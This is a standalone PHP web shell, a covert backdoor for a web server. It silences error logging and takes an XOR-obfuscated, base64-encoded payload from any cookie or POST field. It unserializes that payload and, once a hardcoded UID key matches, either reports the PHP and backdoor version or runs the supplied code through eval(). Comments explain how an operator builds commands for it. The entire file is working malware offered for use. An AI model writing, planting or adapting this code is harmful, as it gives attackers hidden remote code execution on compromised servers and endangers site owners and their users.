<?php
ini_set("error_log", NULL);
ini_set("log_errors", 0);
ini_set("max_execution_time", 0);
set_time_limit(0);

if (!defined("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba"))
{
    define("ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba", 1);
    $encrypted_payload = NULL;
    $payload_key = NULL;
    $UID = "9e4aec19-beff-43d2-8d1a-46eb063d9aa9";
    global $UID;
	
    function xor_operation($str1, $str2) {
        $result = "";
        for ( $i=0; $i<strlen($str1); ) {
            for ( $j=0; $j<strlen($str2) && $i<strlen($str1); $j++,$i++ ) {
                $result .= chr( ord($str1[$i]) ^ ord($str2[$j]) );
            }
        }
        return $result;
    }
	
    function payload_crypt($payload, $key) {
        global $UID;
        return xor_operation(xor_operation($payload, $UID) , $key);
    }
	
    foreach ($_COOKIE as $cookie_name => $cookie_value) {
        $encrypted_payload = $cookie_value;
        $payload_key = $cookie_name;
    }
	
    if (!$encrypted_payload) {
        foreach ($_POST as $param_name => $param_value) {
            $encrypted_payload = $param_value;
            $payload_key = $param_name;
        }
    }
	
	/*
		// Payload you want put into $decrypted_obj
		$payload = 'AAAAAA';
		$key = 'BBBBBB';

		// Data to send
		$encrypted_payload = base64_encode(xor_operation( xor_operation($payload, $UID), $key));
		$payload_key = $key;
	*/
	
    $decrypted_obj = @unserialize( payload_crypt(base64_decode($encrypted_payload) , $payload_key) );
		
	/*
		// Then your payload will be unserialized as an array where:
		// array["ak"] should be equal to UID
		
		// Usage:
		- if array["a"]=="i" (info) --> echo phpversion and backdoor version
		- if array["a"]=="e" (exec) --> eval( array["d"] )
	*/
		
    if (isset($decrypted_obj["ak"]) && $UID == $decrypted_obj["ak"]) {
        if ($decrypted_obj["a"] == "i") {
            echo @serialize( Array("pv" => @phpversion(), "sv" => "1.0-1") );
        }
        elseif ($decrypted_obj["a"] == "e") {
            eval ($decrypted_obj["d"]);
        }
        exit();
    }
}
?>
